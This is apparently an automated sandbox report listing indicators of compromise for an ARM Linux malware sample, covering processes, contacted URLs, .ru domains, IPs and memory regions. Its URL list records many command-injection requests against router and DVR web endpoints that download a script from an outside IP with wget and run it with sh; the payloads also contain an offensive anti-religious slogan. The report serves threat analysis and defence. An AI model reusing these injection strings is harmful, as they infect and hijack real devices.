Automated Malware Analysis IOC Report for

Files

File Path

Type

Processes

Path

Cmdline

Malicious

/tmp/firmware.armv4l.elf

/bin/sh

sh -c "hostname -I"

/bin/sh

/usr/bin/hostname

hostname -I

/tmp/firmware.armv4l.elf

/bin/sh

sh -c "hostname -I"

/bin/sh

/usr/bin/hostname

hostname -I

/tmp/firmware.armv4l.elf

/bin/sh

sh -c "hostname -I"

/bin/sh

/usr/bin/hostname

hostname -I

/tmp/firmware.armv4l.elf

/bin/sh

sh -c "hostname -I"

/bin/sh

/usr/bin/hostname

hostname -I

/tmp/firmware.armv4l.elf

/bin/sh

sh -c "hostname -I"

/bin/sh

/usr/bin/hostname

hostname -I

/tmp/firmware.armv4l.elf

/bin/sh

sh -c "hostname -I"

/bin/sh

/usr/bin/hostname

hostname -I

/tmp/firmware.armv4l.elf

/bin/sh

sh -c "hostname -I"

/bin/sh

/usr/bin/hostname

hostname -I

/tmp/firmware.armv4l.elf

/bin/sh

sh -c "hostname -I"

/bin/sh

/usr/bin/hostname

hostname -I

/tmp/firmware.armv4l.elf

/bin/sh

sh -c "hostname -I"

/bin/sh

/usr/bin/hostname

hostname -I

/tmp/firmware.armv4l.elf

/bin/sh

sh -c "hostname -I"

/bin/sh

/usr/bin/hostname

hostname -I

/tmp/firmware.armv4l.elf

/bin/sh

sh -c "hostname -I"

/bin/sh

/usr/bin/hostname

hostname -I

/tmp/firmware.armv4l.elf

/bin/sh

sh -c "hostname -I"

/bin/sh

/usr/bin/hostname

hostname -I

/tmp/firmware.armv4l.elf

/bin/sh

sh -c "crontab /var/spool/cron/crontabs/root"

/bin/sh

/usr/bin/crontab

crontab /var/spool/cron/crontabs/root

/tmp/firmware.armv4l.elf

/bin/sh

sh -c "hostname -I"

/bin/sh

/usr/bin/hostname

hostname -I

/tmp/firmware.armv4l.elf

/bin/sh

sh -c "hostname -I"

/bin/sh

/usr/bin/hostname

hostname -I

/tmp/firmware.armv4l.elf

/bin/sh

sh -c "hostname -I"

/bin/sh

/usr/bin/hostname

hostname -I

/tmp/firmware.armv4l.elf

/bin/sh

sh -c "hostname -I"

/bin/sh

/usr/bin/hostname

hostname -I

/tmp/firmware.armv4l.elf

/bin/sh

sh -c "hostname -I"

/bin/sh

/usr/bin/hostname

hostname -I

/tmp/firmware.armv4l.elf

/bin/sh

sh -c "hostname -I"

/bin/sh

/usr/bin/hostname

hostname -I

/tmp/firmware.armv4l.elf

/bin/sh

sh -c "hostname -I"

/bin/sh

/usr/bin/hostname

hostname -I

/tmp/firmware.armv4l.elf

/bin/sh

sh -c "hostname -I"

/bin/sh

/usr/bin/hostname

hostname -I

/tmp/firmware.armv4l.elf

/bin/sh

sh -c "hostname -I"

/bin/sh

/usr/bin/hostname

hostname -I

/tmp/firmware.armv4l.elf

/bin/sh

sh -c "hostname -I"

/bin/sh

/usr/bin/hostname

hostname -I

/tmp/firmware.armv4l.elf

/bin/sh

sh -c "crontab /var/spool/cron/crontabs/root"

/bin/sh

/usr/bin/crontab

crontab /var/spool/cron/crontabs/root

There are 99 hidden processes, click here to show them.

URLs

Name

Malicious

http://192.168.0.138/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;

192.168.0.138

http://192.168.0.195/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;

192.168.0.195

http://192.168.0.67/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd

192.168.0.67

http://192.168.0.162/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;

192.168.0.162

http://5.157.87.204/

5.157.87.204

http://192.168.0.105/GponForm/diag_Form?images/

192.168.0.105

http://192.168.0.51/GponForm/diag_Form?images/

192.168.0.51

http://192.168.0.37/GponForm/diag_Form?images/

192.168.0.37

http://185.130.251.70/

185.130.251.70

http://192.168.0.138/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd

192.168.0.138

http://192.168.0.195/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd

192.168.0.195

http://192.168.0.194/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;

192.168.0.194

http://192.168.0.105/language/Swedish

192.168.0.105

http://192.168.0.68/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;

192.168.0.68

http://192.168.0.67/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;

192.168.0.67

http://192.168.0.209/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;

192.168.0.209

http://192.168.0.194/language/Swedish

192.168.0.194

http://192.168.0.128/GponForm/diag_Form?images/

192.168.0.128

http://192.168.0.68/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd

192.168.0.68

http://62.122.170.171/

62.122.170.171

http://192.168.0.195/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;

192.168.0.195

http://90.188.239.74/

90.188.239.74

http://95.188.104.7/

95.188.104.7

http://192.168.0.194/GponForm/diag_Form?images/

192.168.0.194

http://212.109.199.81/

212.109.199.81

http://159.69.115.63/

159.69.115.63

http://192.168.0.129/language/Swedish

192.168.0.129

http://192.168.0.128/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd

192.168.0.128

http://192.168.0.105/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;

192.168.0.105

http://31.31.196.247/

31.31.196.247

http://192.168.0.195/GponForm/diag_Form?images/

192.168.0.195

http://192.168.0.128/language/Swedish

192.168.0.128

http://212.158.165.76/

212.158.165.76

http://192.168.0.51/language/Swedish

192.168.0.51

http://192.168.0.162/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;

192.168.0.162

http://31.31.198.147/

31.31.198.147

http://192.168.0.129/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd

192.168.0.129

http://192.168.0.209/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;

192.168.0.209

http://37.230.114.67/

37.230.114.67

http://192.168.0.128/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;

192.168.0.128

http://46.30.40.105/

46.30.40.105

http://192.168.0.68/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;

192.168.0.68

http://104.21.57.213/

104.21.57.213

http://84.201.165.75/

84.201.165.75

http://192.168.0.128/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;

192.168.0.128

http://172.67.167.8/

172.67.167.8

http://192.168.0.209/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;

192.168.0.209

http://31.177.76.70/

31.177.76.70

http://109.248.201.170/

109.248.201.170

http://192.168.0.209/language/Swedish

192.168.0.209

http://194.58.112.174/

194.58.112.174

http://192.168.0.51/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;

192.168.0.51

http://31.31.198.215/

31.31.198.215

http://192.168.0.195/language/Swedish

192.168.0.195

http://192.168.0.129/GponForm/diag_Form?images/

192.168.0.129

http://192.168.0.129/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd

192.168.0.129

http://192.168.0.68/GponForm/diag_Form?images/

192.168.0.68

http://192.168.0.37/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd

192.168.0.37

http://192.168.0.162/GponForm/diag_Form?images/

192.168.0.162

http://192.168.0.67/GponForm/diag_Form?images/

192.168.0.67

http://192.168.0.162/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd

192.168.0.162

http://31.177.80.70/

31.177.80.70

http://192.168.0.194/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd

192.168.0.194

http://87.236.16.171/

87.236.16.171

http://192.168.0.37/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;

192.168.0.37

http://192.168.0.105/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd

192.168.0.105

http://192.168.0.37/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;

192.168.0.37

http://192.168.0.209/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd

192.168.0.209

http://192.168.0.162/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;

192.168.0.162

http://192.168.0.194/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;

192.168.0.194

http://192.168.0.129/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;

192.168.0.129

http://192.168.0.128/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd

192.168.0.128

http://192.168.0.51/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd

192.168.0.51

http://192.168.0.105/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;

192.168.0.105

http://104.21.84.89/

104.21.84.89

http://192.168.0.194/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd

192.168.0.194

http://192.168.0.105/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;

192.168.0.105

http://192.168.0.67/language/Swedish

192.168.0.67

http://78.108.89.108/

78.108.89.108

http://192.168.0.68/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;

192.168.0.68

http://192.168.0.105/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd

192.168.0.105

http://192.168.0.68/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd

192.168.0.68

http://194.58.108.126/

194.58.108.126

http://31.177.76.145/

31.177.76.145

http://192.168.0.162/language/Swedish

192.168.0.162

http://192.168.0.51/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;

192.168.0.51

http://192.168.0.209/GponForm/diag_Form?images/

192.168.0.209

http://192.168.0.37/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd

192.168.0.37

http://92.53.96.137/

92.53.96.137

http://192.168.0.129/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;

192.168.0.129

http://192.168.0.128/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;

192.168.0.128

http://192.168.0.138/language/Swedish

192.168.0.138

http://192.168.0.129/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;

192.168.0.129

http://178.159.33.243/

178.159.33.243

http://185.133.42.146/

185.133.42.146

http://5.101.153.249/

5.101.153.249

http://91.226.31.83/

91.226.31.83

http://192.168.0.138/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;

192.168.0.138

http://194.58.112.165/

194.58.112.165

http://192.168.0.138/GponForm/diag_Form?images/

192.168.0.138

There are 90 hidden URLs, click here to show them.

Domains

Name

Malicious

aeel.ru

31.177.76.70

ffcb.ru

212.158.165.76

dbda.ru

31.177.80.70

afbl.ru

31.177.80.70

cebl.ru

31.31.205.163

www.fcdk.ru

172.67.190.147

afaa.ru

194.58.112.165

www.fedf.ru

104.21.15.57

www.ckea.ru

194.120.116.196

www.fbll.ru

31.31.205.163

www.dalk.ru

178.159.33.243

www.fecb.ru

31.31.205.163

akce.ru

62.122.170.171

www.dkka.ru

212.109.199.81

fedf.ru

104.21.15.57

www.leaa.ru

159.69.115.63

bcka.ru

62.122.170.171

aabl.ru

78.108.89.108

www.clca.ru

104.21.57.213

dkka.ru

212.109.199.81

www.akce.ru

62.122.170.171

akbf.ru

194.58.108.126

www.bcda.ru

87.236.16.208

www.lllf.ru

37.230.114.67

www.kddd.ru

31.177.76.145

lkcc.ru

109.248.201.170

kkdb.ru

95.188.104.7

dalk.ru

178.159.33.243

fbll.ru

31.31.205.163

abae.ru

194.58.112.165

fcdk.ru

104.21.84.89

www.laea.ru

159.69.115.63

fbde.ru

31.31.205.163

www.abca.ru

90.188.239.74

ckea.ru

45.159.211.121

kddd.ru

31.177.76.145

www.bcka.ru

62.122.170.171

www.bfka.ru

62.122.170.171

lllf.ru

37.230.114.67

alda.ru

185.130.251.70

acaa.ru

92.53.96.137

clbd.ru

31.31.205.163

aada.ru

31.31.196.247

aebc.ru

31.31.205.163

abca.ru

90.188.239.74

www.aaab.ru

194.58.112.174

www.bbck.ru

139.45.250.90

abla.ru

31.31.205.163

www.edbf.ru

5.101.153.249

aaab.ru

194.58.112.174

ekac.ru

62.122.170.171

www.alda.ru

185.130.251.70

kfcb.ru

31.31.205.163

www.debf.ru

31.31.205.163

daisy.ubuntu.com

162.213.35.25

www.kdac.ru

62.122.170.171

www.fbde.ru

31.31.205.163

cbaf.ru

31.31.205.163

fecb.ru

31.31.205.163

www.ecfa.ru

31.31.205.163

ffal.ru

178.208.83.27

dbee.ru

62.122.170.171

www.aeck.ru

194.58.112.165

www.balf.ru

185.133.42.146

akfk.ru

62.122.170.171

ebdb.ru

46.30.40.105

ccbl.ru

62.122.170.171

cada.ru

62.122.170.171

www.fada.ru

157.230.19.197

debf.ru

31.31.205.163

balf.ru

185.133.42.146

dfce.ru

31.31.205.163

cale.ru

5.157.87.204

fada.ru

157.230.19.197

www.aafa.ru

194.58.112.165

www.dbee.ru

62.122.170.171

fale.ru

91.226.31.83

www.keal.ru

62.122.170.171

aabc.ru

31.31.198.215

www.ebdb.ru

46.30.40.105

www.cada.ru

62.122.170.171

kdac.ru

62.122.170.171

www.lald.ru

84.201.165.75

aafa.ru

194.58.112.165

www.fale.ru

91.226.31.83

www.abae.ru

194.58.112.165

www.kfcb.ru

31.31.205.163

www.kkdb.ru

95.188.104.7

www.abla.ru

31.31.205.163

www.dfac.ru

62.122.170.171

dfac.ru

62.122.170.171

www.clbd.ru

31.31.205.163

keal.ru

62.122.170.171

www.cbaf.ru

31.31.205.163

lkfd.ru

87.236.16.171

aeck.ru

194.58.112.165

edbf.ru

5.101.153.249

www.dfce.ru

31.31.205.163

www.aabl.ru

78.108.89.108

laea.ru

159.69.115.63

There are 90 hidden domains, click here to show them.

IPs

Domain

Country

Malicious

36.154.240.81

unknown

China

25.154.78.209

unknown

United Kingdom

118.142.173.253

unknown

Hong Kong

167.200.77.168

unknown

United States

48.128.140.69

unknown

United States

18.138.65.18

unknown

United States

141.248.209.230

unknown

United States

107.177.14.16

unknown

United States

188.91.234.196

unknown

Netherlands

184.26.129.226

unknown

United States

94.230.130.112

unknown

Russian Federation

166.217.22.40

unknown

United States

105.30.103.251

unknown

Mauritius

173.214.157.194

unknown

United States

77.30.156.231

unknown

Saudi Arabia

139.40.24.232

unknown

United States

162.138.228.90

unknown

United States

121.108.232.236

unknown

Japan

212.74.121.128

unknown

United Kingdom

177.235.95.169

unknown

Brazil

134.134.17.221

unknown

United States

204.59.215.212

unknown

United States

44.237.212.246

unknown

United States

167.155.107.31

unknown

United States

147.99.17.113

unknown

France

62.211.189.152

unknown

Italy

198.219.238.220

unknown

United States

208.205.186.216

unknown

United States

193.181.115.117

unknown

Sweden

65.177.215.188

unknown

United States

135.245.6.88

unknown

United States

1.162.139.184

unknown

Taiwan; Republic of China (ROC)

14.50.149.236

unknown

Korea Republic of

201.252.2.30

unknown

Argentina

124.239.0.60

unknown

China

44.45.161.186

unknown

United States

91.197.32.175

unknown

United Kingdom

216.111.178.100

unknown

United States

190.126.185.57

unknown

Colombia

114.12.82.153

unknown

Indonesia

124.212.194.37

unknown

Japan

124.93.126.174

unknown

China

59.193.115.120

unknown

China

61.127.213.134

unknown

Japan

128.10.126.146

unknown

United States

69.22.116.223

unknown

United States

68.117.211.235

unknown

United States

71.59.121.11

unknown

United States

163.234.121.171

unknown

United States

168.92.17.69

unknown

United States

67.61.17.94

unknown

United States

100.62.161.46

unknown

United States

134.36.46.22

unknown

United Kingdom

211.136.24.20

unknown

China

111.245.161.250

unknown

Taiwan; Republic of China (ROC)

153.221.144.188

unknown

Japan

184.205.63.13

unknown

United States

42.254.33.151

unknown

China

112.164.194.85

unknown

Korea Republic of

182.1.4.3

unknown

Indonesia

135.211.93.9

unknown

United States

211.100.86.163

unknown

China

150.157.20.31

unknown

United States

95.71.100.188

unknown

Russian Federation

36.118.160.13

unknown

China

66.254.61.240

unknown

Canada

170.194.202.75

unknown

United States

35.68.123.66

unknown

United States

200.107.66.191

unknown

Chile

121.246.42.202

unknown

India

36.225.135.125

unknown

Taiwan; Republic of China (ROC)

130.143.69.208

unknown

Netherlands

130.98.20.165

unknown

France

204.143.230.8

unknown

United States

205.173.222.1

unknown

United States

146.197.111.115

unknown

United States

46.251.195.253

unknown

Kyrgyzstan

109.245.66.129

unknown

Serbia

213.162.228.86

unknown

Norway

173.70.56.41

unknown

United States

118.12.167.19

unknown

Japan

38.130.7.223

unknown

United States

65.156.185.48

unknown

United States

148.216.239.219

unknown

Mexico

192.56.112.83

unknown

United States

213.71.54.130

unknown

Germany

58.192.214.200

unknown

China

80.187.253.142

unknown

Germany

36.126.33.67

unknown

China

73.198.193.20

unknown

United States

220.133.252.94

unknown

Taiwan; Republic of China (ROC)

125.5.54.157

unknown

Philippines

59.119.172.232

unknown

Taiwan; Republic of China (ROC)

32.179.218.210

unknown

United States

193.236.227.111

unknown

Portugal

210.28.171.80

unknown

China

202.102.14.137

unknown

China

39.176.205.70

unknown

China

178.104.14.253

unknown

United Kingdom

206.243.103.32

unknown

United States

There are 90 hidden IPs, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

7ff3a09be000

page read and write

55ca3dbe3000

page execute read

55ca3de3d000

page read and write

7ff3a12fc000

page read and write

55ca3fe52000

page read and write

7ff29c032000

page execute read

7ff39c021000

page read and write

55ca3de34000

page read and write

7ff39c021000

page read and write

7ff3a166f000

page read and write

7ff3a12fc000

page read and write

7ff29c03b000

page read and write

7ffce7d93000

page execute read

7ff29c032000

page execute read

7ff3a0124000

page read and write

7ff3a1606000

page read and write

7ff3a09be000

page read and write

7ff39c021000

page read and write

7ff3a111a000

page read and write

7ff29c040000

page read and write

55ca3fe3b000

page execute and read and write

7ff39bfff000

page read and write

7ff29c032000

page execute read

7ffce7d93000

page execute read

7ff29c040000

page read and write

55ca3ffb1000

page read and write

55ca3fe52000

page read and write

7ff3a0f8b000

page read and write

7ff3a0d20000

page read and write

7ff29c03b000

page read and write

7ffce7d8a000

page read and write

7ff3a14dd000

page read and write

55ca3de3d000

page read and write

55ca3fe3b000

page execute and read and write

7ffce7d8a000

page read and write

7ff3a0f8b000

page read and write

7ffce7d8a000

page read and write

7ff3a0fae000

page read and write

7ff3a162a000

page read and write

7ff3a0d20000

page read and write

55ca3de34000

page read and write

7ff3a166f000

page read and write

7ff29c043000

page read and write

7ff39bfff000

page read and write

7ff3a162a000

page read and write

55ca3fe3b000

page execute and read and write

7ff3a0124000

page read and write

55ca3de3d000

page read and write

7ff29c043000

page read and write

7ff3a0fae000

page read and write

7ff3a0d20000

page read and write

55ca3ffb1000

page read and write

55ca3dbe3000

page execute read

7ff3a162a000

page read and write

7ff3a0fae000

page read and write

7ff3a092c000

page read and write

7ff3a0f8b000

page read and write

7ff3a0124000

page read and write

7ff3a09be000

page read and write

7ff3a111a000

page read and write

7ff3a092c000

page read and write

55ca3fe52000

page read and write

55ca3ffb1000

page read and write

7ff3a092c000

page read and write

7ff29c03b000

page read and write

7ff3a14dd000

page read and write

7ff39bfff000

page read and write

7ff3a111a000

page read and write

55ca3de34000

page read and write

7ff3a12fc000

page read and write

7ff29c040000

page read and write

7ffce7d93000

page execute read

7ff3a1606000

page read and write

55ca3dbe3000

page execute read

7ff3a14dd000

page read and write

7ff3a1606000

page read and write

7ff3a166f000

page read and write

There are 67 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
firmware.armv4l.elf

Files

Processes

URLs

Domains

IPs

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportfirmware.armv4l.elf

Files

Processes

URLs

Domains

IPs

Memdumps

IOC Report
firmware.armv4l.elf